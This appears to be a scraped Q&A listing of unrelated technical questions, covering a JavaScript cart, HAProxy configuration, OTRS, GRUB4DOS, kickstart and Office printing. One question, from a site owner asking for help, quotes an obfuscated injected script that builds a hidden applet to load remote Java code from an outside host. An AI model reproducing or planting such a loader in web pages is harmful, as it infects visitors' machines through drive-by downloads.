    I've made a simple Javascript code for a shopping basket but now I have realised that I have made a error with making it and don't know how to fix it. What I have is Javascript file but I have also included the images source and the addtocart button as well, but What I am trying to do now is make 2 files one a .HTML file and another .JS file, but I can't get it to because when I make a button in the HTML file to call the function from the .JS file it won't work at all. <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML> <HEAD><TITLE>shopping</TITLE> <META http-equiv=Content-Type content="text/html; charset=UTF-8"> <STYLE type=text/CSS> fieldset{width:300px} legend{font-size:24px;font-family:comic sans ms;color:#004455} </STYLE> <META content="MSHTML 6.00.2900.2963" name=GENERATOR></HEAD> <BODY scroll="auto"> <div id="products"></div><hr> <div id="inCart"></div> <SCRIPT type="text/javascript"> var items=['Xbox~149.99','StuffedGizmo~19.98','GadgetyGoop~9.97']; var M='?'; var product=[]; var price=[]; var stuff=''; function wpf(product,price){var pf='<form><FIELDSET><LEGEND>'+product+'</LEGEND>'; pf+='<img src="../images/'+product+'.jpg" alt="'+product+'" ><p>price '+M+''+price+'</p> <b>Qty</b><SELECT>'; for(i=0;i<6;i++){pf+='<option value="'+i+'">'+i+'</option>'} pf+='</SELECT>'; pf+='<input type="button" value="Add to cart" onclick="cart()" /></FIELDSET></form>'; return pf } for(j=0;j<items.length;j++){ product[j]=items[j].substring(0,items[j].indexOf('~')); price[j]=items[j].substring(items[j].indexOf('~')+1,items[j].length); stuff+=''+wpf(product[j],price[j])+''; } document.getElementById('products').innerHTML=stuff; function cart(){ var order=[]; var tot=0 for(o=0,k=0;o<document.forms.length;o++){ if(document.forms[o].elements[1].value!=0){ qnty=document.forms[o].elements[1].value; order[k]=''+product[o]+'_'+qnty+'*'+price[o]+''; tot+=qnty*price[o];k++ } } document.getElementById('inCart').innerHTML=order.join('<br>')+'<h3>Total '+tot+'</h3>'; } </SCRIPT> <input type="button" value="Add to cart" onclick="cart()" /></FIELDSET></form> </BODY></HTML>

  • Javascript or CSS hover not working in Safari and Chrome

    - by PAZtech
    I have a problem with a script for a image gallery. The problem seems to only occur on Safari and Chrome, but if I refresh the page I get it to work correctly - weird! Correct function: The gallery has a top bar, which if you hover over it, it will display a caption. Below sits the main image. At the bottom there is another bar that is a reversal of the top bar. When you hover over it, it will display thumbnails of the gallery. The problem: In Safari and Chrome, the thumbnail holder will not display. In fact, it doesn't even show it as an active item (or a rollover). But oddly enough, if you manually refresh the page it begins to work correctly for the rest of the time you view the page. Once you have left the page and return the same error occurs again and you have to go through the same process. Here's one of the pages to look at: link text Here's the CSS: #ThumbsGutter { background: url(../Images/1x1.gif); background: url(/Images/1x1.gif); height: 105px; left: 0px; position: absolute; top: 0px; • Windows 2003 Domain Controller Very Upset about NIC Teaming

    - by Kyle Brandt
    I set up BACS (Broadcom Teaming) to team two NIC on a Windows 2003 Active Directory Domain Controller. Networking still works okay, I can ping the gateway etc, but both DNS and Active Directory fail to start with various 40xx errors. The team that I created is Smart load Balancing with Failover, with one backup and only one in smart load balancing (So really it is just failover). I have the team the same IP address that the single active NIC had before. Anyone seen this before, or have any ideas what the problem might be? • OTRS upgrade 3.0 to 3.1 fails

    - by Valentin0S
    Today I've started upgrading OTRS from version 2.3 to 2.4 , 2.4 to 3.0 and 3.0 to 3.1. Everything went smoothly except the upgrade from 3.0 to 3.1 OTRS provides a few perl scripts which make the upgrade easier. I've used these scripts for each upgrade step. The upgrade from 3.0 to 3.1 fails at the following after using the upgrade script. scripts/DBUpdate-to-3.1.pl The error is : root@tickets:/opt/otrs# su - otrs $ scripts/DBUpdate-to-3.1.pl Migration started... • Sticky connection and HTTPS support for HAProxy

    - by Saif
    Hi Mates, We have 2 HTTP Load balancer with HAproxy and heartbeat. There are 4 apache nodes in this cluster. It's doing round robin load balancing. The HTTP cluster working fine. We are having problem with our portal because it uses SSO. We need sticky connection support in our HAproxy. Also we need load balancing for HTTPS traffic. Here's our HAproxy conf file. global # to have these messages end up in /var/log/haproxy.log you will # need to: # # 1) configure syslog to accept network log events. This is done # by adding the '-r' option to the SYSLOGD_OPTIONS in # /etc/sysconfig/syslog # # 2) configure local2 events to go to the /var/log/haproxy.log # file. A line like the following can be added to # /etc/sysconfig/syslog # # local2.* /var/log/haproxy.log # log 127.0.0.1 local0 log 127.0.0.1 local1 notice chroot /var/lib/haproxy pidfile /var/run/haproxy.pid maxconn 4000 user haproxy group haproxy daemon # turn on stats unix socket stats socket /var/lib/haproxy/stats #--------------------------------------------------------------------- # common defaults that all the 'listen' and 'backend' sections will # use if not designated in their block #--------------------------------------------------------------------- defaults mode http log global option httplog option dontlognull option http-server-close option forwardfor except 127.0.0.0/8 option redispatch retries 3 timeout http-request 10s timeout queue 1m timeout connect 10s timeout client 1m timeout server 1m timeout http-keep-alive 10s timeout check 10s maxconn 3000 #--------------------------------------------------------------------- # main frontend which proxys to the backends #--------------------------------------------------------------------- frontend main *:5000 acl url_static path_beg -i /static /images /javascript /stylesheets acl url_static path_end -i .jpg .gif .png .css .js use_backend static if url_static default_backend app #--------------------------------------------------------------------- # static backend for serving up images, stylesheets and such #--------------------------------------------------------------------- backend static balance roundrobin server static 127.0.0.1:4331 check #--------------------------------------------------------------------- # round robin balancing between the various backends #--------------------------------------------------------------------- backend app listen ha-http 10.190.1.28:80 mode http stats enable stats auth admin:xxxxxx balance roundrobin cookie JSESSIONID prefix option httpclose option forwardfor option httpchk HEAD /haproxy.txt HTTP/1.0 server apache1 portal-04:80 cookie A check server apache2 im-01:80 cookie B check server apache3 im-02:80 cookie B check server apache4 im-03:80 cookie B check Please advice. • Why is my Current Printer unavailable in Office ?

    - by cros
    Whenever I try to print any document from Microsoft Office 2007 in Windows Vista 64-bit there is a great possibility that the print job will fail with the following error message: Current printer is unavailable. Select another printer. Only problem is no printer works, not even Bullzip PDF Printer. The only way to resolve this that I have found so far is a reboot, but I don't want to do that all the time. I am using Windows Vista 64-bit. I've had the problem using both SP1 and SP2. The problem occurs on both locally installed and network printers, as well as the virtual printer Bullzip PDF Printer. My primary source of the problem has been Excel, but the error has also occurred in Word. Changing the default printer and restarting the Microsoft Office-application solves this temporarily, but not permanently. Google:ing the error message returns a lot of questions but no solutions, so seems like a frequent problem. What could be a permanent solution for this problem? UPDATE: It seems that my problem stems from me opening MS Office applications by opening a document from Total Commander with administrative rights. This somehow makes the applications not find the printers. Opening MS Office applications either from the Start menu or by opening a document in a non-administrator Explorer allows me to print.

  • kickstart: reference floppy drive via %ksappend or %include

    - by virtualeyes
    Having trouble getting %ksappend or %include to work when referencing a local floppy drive. Booting off remote server's cd-rom drive I am able to load the CentOS 6 minimal install image, and then add ks=hd:fd0/ks-jvm.cfg to boot params to load kickstart init file from floppy disk. That works fine. The problem is that I want to load a streamlined generic init file off the floppy and then, within the init, %ksappend or %include specific config files relative to the type of server I'm building (JVM, MySQL, Apache, etc.) I do not have DHCP, networking needs to be specified statically, so %ksappend and %include both fail when attempting to reference http://some-LAN-IP/foo.cfg since networking has not yet been set. The kickstart setup only works when I glob in the entire config into a single file, which is great, but ugly and difficult to maintain when I return later, having forgotten the original setup. At this point I'd be happy if I could get %ksappend or %include working with a floppy drive reference in the %post section; that would consolidate a lot of common boilerplate that all kickstarts will rely on (sshd_config, rsync config, resolve.conf, and so on) Thanks for providing the magic floppy drive reference that is eluding me!

  • Malware Cross Site Scriptinig attack / XSS Attack?

    - by user124176
    I have been hit by an Cross Site Scripting / XSS / RFI Attack, where I cant find it anywhere in the source of the files and Hashes on files have not been changed according to OSSEC HIDS that I run real time monitoring on all webdirs. The Attack happens on IE9 Only it and appends java script code like beneath, notice that it starts after /html tag closes normally. : scXXpt language="javascXXpt"var enuwjo = function(gqumas, yhxxju, zbkpilf, xzzvhld){var xew = function(iso) {var crh, eaq, i; var owb=""; crh = iso.length; for (i = 0; i < crh; ++i) {eaq = iso.charCodeAt(i)-2;owb = owb + String.fromCharCode(eaq);} return(owb); } var janlq=document.createElement(xew("crrngv"));janlq.setAttribute(xew("eqfg"), xew(gqumas));janlq.setAttribute(xew("ctejkxg"), xew("jvvr<11"+yhxxju));janlq.setAttribute(xew("ykfvj"), "1");janlq.setAttribute(xew("jgkijv"), "1");var lgtwyi=document.createElement(xew("rctco"));lgtwyi.setAttribute(xew("pcog"),xew(zbkpilf));lgtwyi.setAttribute(xew("xcnwg"),xew(xzzvhld));janlq.appendChild(lgtwyi);document.body.appendChild(janlq); } ; enuwjo("vxfgwtogg0dcrcmnwe0encuu","g{g0o{yge{0kp129;5","mlit{ttmdttponfhrrexihpe","fh;ccfe:85:5d9872;2;f569276h5268ff9;34:25;7d:8:7h8c68777;;822c73"); No code has been changed on file as far as my HIDS says ... but I can see in my Error log, the following... File does not exist: /var/www/vhosts/superkids.dk/ggtest/tvdeurmee In the Access log, the following IP - - [09/Jun/2012:23:30:13 +0200] "GET /tvdeurmee/bapakluc.class HTTP/1.1" 404 504 "-" "Mozilla/4.0 (Windows 7 6.1) Java/1.7.0_04" IP - - [09/Jun/2012:23:30:13 +0200] "GET /tvdeurmee/bapakluc/class.class HTTP/1.1" 404 509 "-" "Mozilla/4.0 (Windows 7 6.1) Java/1.7.0_04" Now... the folder or path /tvdeurmee/bapakluc/ does not exist on the server in question, nor does the Java Class class.class, yet it still looks like an local call to the server and it was getting an "404 File not found / 504 Gateway Timeout" (attack was blocked by local machine, hence the timeout / not found) Any idea on how to prevent the attack ? Im working on using HTML Purifier, but that might not be the correct idea it seems, according to some replies im getting on their forum :) Kind regards, Steven

  • Boot ISO image from GRUB4DOS on EFI machines

    - by Vladimir Tikhomirov
    I failed with loading ISO image (non-distro) from GRUB2 from USB stick, but found the way how I can boot the GRUB4DOS and then load the image from there. However, it doesn't work all the time and the questions is WHY it doesn't? Environment and loading process: We need to have EFI machine, USB stick, booting ISO, GRUB2 and GRUB4DOS. Last 3 on USB stick. Boot: USB - EFI loader - GRUB2 - GRUB4DOS - ISO image Configuration files To boot GRUB4DOS I use this from grub.cfg: menuentry "image.iso" { linux /syslinux/grub.exe --config-file="/menu.lst" } My menu.lst is here: timeout 20 default 0 title image.iso find --set-root --ignore-floppies --ignore-cd //image.iso map --heads=0 --sectors-per-track=0 //image.iso (hd32) map --hook chainloader (hd32) This works perfectly with Legacy machines. However, when I come to GRUB4DOS, I don't see the menu with image.iso, I see only GRUB command line. That means that my menu.lst didn't load. Why is it like this? Background and ideas I have an idea that GRUB4DOS doesn't recognize my USB stick as a device. I tried the command find and got (hd0,0), (hd0,1), (hd0,2), (rd). When I tried to set root to any of these devices I don't see fat file system, how it was with Legacy machines. The root device is (hd0,0), which has ntfs file system which should be partition with Windows. EFI machines support only GRUB2, so I can't boot GRUB4DOS straight away. Please, don't suggest anything like this, because my image doesn't have kernel. You can imagine that you load HDAT2 or Hiren's boot cd, for example. menuentry "Blancco Blancco5.iso" { set isofile="/image.iso" loopback loop $isofile set root=(loop) linux /isolinux/vmlinuz isofile=$isofile splash quiet initrd /isolinux/initrd }
